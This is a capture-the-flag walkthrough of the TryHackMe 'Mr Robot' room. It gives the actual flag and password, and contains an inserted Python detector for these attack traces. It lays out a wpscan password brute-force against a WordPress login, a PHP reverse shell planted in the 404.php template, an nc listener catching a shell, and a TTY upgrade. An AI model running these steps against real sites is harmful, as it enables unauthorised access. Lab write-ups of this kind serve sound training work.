https://tryhackme.com/room/mrrobot
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
For some reason I am getting this error in gobuster, so I just move forward and continue:
Error: error on running gobuster: Get "http://10.10.212.139/64c59a6e-356f-4e6d-b902-4bcc921bb0f5": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Going to http://<ip>/robots.txt, we find the path to a dictionary file and the first flag:
073403c8a58a1f80d943455fb30724b9
Now we have a wordlist called fsocity.dic.
On http://<ip>/wp-login/ we can see it is a WordPress website.
Based on the series Mr. Robot we can guess the username as elliot and brute-force the login using wpscan with the wordlist obtained above, fsocity.dic:
wpscan --url http://<ip>/wp-login/ --usernames elliot --passwords fsocity.dic
After about 20-30 minutes we get the password:
ER28-0652
Once we log in, we go to Appearance > Editor. On the right, click on "404 Template", which is the 404.php page, and paste our PHP reverse shell code there.
Once saved, we can visit this URL to trigger the reverse shell while our nc listener is running:
http://<ip>/wordpress/wp-content/themes/twentyfifteen/404.php
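As an added defender-side example (not part of the original writeup), the following Python flags in Apache access logs the two actions described above: the wpscan-style burst of POSTs to the WordPress login, and a theme-editor save like the one used to replace 404.php. The log lines, client IPs and the /wp-admin/theme-editor.php save path are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined-log prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse(line):
    """Return a dict with ip, ts (datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d

def find_login_bruteforce(lines, threshold=20, window_s=300):
    """Map source IP -> total login POSTs, for IPs that sent at least
    `threshold` POSTs to wp-login inside any `window_s`-second window."""
    posts = defaultdict(list)
    for d in filter(None, map(parse, lines)):
        if d["method"] == "POST" and "wp-login" in d["path"]:
            posts[d["ip"]].append(d["ts"])
    hits = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = len(times)
                break
    return hits

def find_theme_editor_writes(lines):
    """List (ip, path) for POSTs to the theme editor: a save there is how 404.php gets replaced."""
    return [(d["ip"], d["path"]) for d in filter(None, map(parse, lines))
            if d["method"] == "POST" and "theme-editor.php" in d["path"]]

# Constructed sample log: 25 login POSTs in 25 seconds from one IP (wpscan-like),
# two ordinary visits from another IP, then a theme-editor save from the first IP.
SAMPLE_LOG = [f'10.0.0.5 - - [16/Sep/2015:10:45:{i:02d} +0000] '
              f'"POST /wp-login.php HTTP/1.1" 200 3985' for i in range(25)]
SAMPLE_LOG += ['10.0.0.9 - - [16/Sep/2015:10:46:10 +0000] "GET /wp-login.php HTTP/1.1" 200 2605',
               '10.0.0.9 - - [16/Sep/2015:10:46:12 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
               '10.0.0.5 - - [16/Sep/2015:11:20:00 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0']
```

On the sample, `find_login_bruteforce(SAMPLE_LOG)` returns `{'10.0.0.5': 25}` and `find_theme_editor_writes(SAMPLE_LOG)` returns the single theme-editor save from the same IP.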
nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.212.139 33736
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
11:57:46 up 35 min, 0 users, load average: 2.63, 2.62, 2.40
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
Upgrade to an interactive TTY:
python -c "import pty; pty.spawn('/bin/bash')"